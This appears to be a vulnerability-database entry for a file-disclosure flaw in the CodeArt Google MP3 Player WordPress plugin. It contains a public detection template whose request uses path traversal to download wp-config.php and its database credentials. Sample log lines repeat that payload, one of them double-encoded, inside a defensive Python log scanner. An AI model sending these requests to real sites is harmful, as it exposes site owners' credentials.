wp-googlemp3-lfi: WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download

Date: 2025-08-01 | Affected software: WordPress Plugin CodeArt Google MP3 Player | PoC: Public

Vulnerability description

The WordPress plugin CodeArt Google MP3 Player allows an unauthenticated attacker to download files from the server through the `file` parameter of `direct_download.php`.

PoC code [public]

id: wp-googlemp3-lfi

info:
  name: WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download
  author: theamanrawat
  severity: critical
  description: |
    WordPress Plugin CodeArt Google MP3 Player allows an unauthenticated attacker to download file from server.
  reference:
    - https://www.exploit-db.com/exploits/35460
    - https://wordpress.org/plugins/google-mp3-audio-player/
  metadata:
    verified: "true"
    max-request: 1
    publicwww-query: "/wp-content/plugins/google-mp3-audio-player/"
  tags: wp-plugin,wp,wordpress,lfi,google-mp3-audio-player,unauth,disclosure,vuln

http:
  - raw:
      - |
        GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../wp-config.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_USER"
          - "DB_PASSWORD"
          - "DB_HOST"
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a5ebc48494b13066015c3b8c43b3f1645d7319a94dfcaf0a3dc91af8fbf5a835022100cabf1e6f73a067d65799cacf21117a545d8c711edf1a809d9c776b93bcf8cbc9:922c64590222798bb761d5b6d8e72950
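
To check whether the request in the template above has already been made against a site, the web server access log can be reviewed for it. The following is an added example, not part of the template or of the plugin: it assumes Combined Log Format, the function names are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint requested by the template above.
PLUGIN_PATH = "/wp-content/plugins/google-mp3-audio-player/direct_download.php"
# Assumed Combined Log Format: ip - user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../wp-config.php HTTP/1.1" 200 3120 "-" "-"',
    '198.51.100.9 - - [01/Aug/2025:10:02:13 +0000] "GET /blog/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=%252e%252e%252f%252e%252e%252fwp-config.php HTTP/1.1" 403 199 "-" "-"',
    '192.0.2.44 - - [01/Aug/2025:10:05:40 +0000] "GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=episode-12.mp3 HTTP/1.1" 200 4812345 "-" "-"',
    '192.0.2.44 - - [01/Aug/2025:10:06:02 +0000] "GET /index.php?file=../x HTTP/1.1" 200 512 "-" "-"',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so nested encodings (%252e) resolve to '.'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True when the decoded value contains a '..' path segment."""
    segments = fully_decode(value).replace("\\", "/").split("/")
    return ".." in segments

def scan(lines):
    """Return one finding per direct_download.php request with a traversal in 'file'."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, target, status = m.groups()
        url = urlsplit(target)
        if not fully_decode(url.path).lower().endswith(PLUGIN_PATH):
            continue
        for value in parse_qs(url.query).get("file", []):
            if is_traversal(value):
                findings.append({"ip": ip, "time": ts, "file": fully_decode(value),
                                 "served": status == "200"})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set to true means the server answered 200, the status the template matches on, so the database credentials in `wp-config.php` should be treated as exposed and rotated.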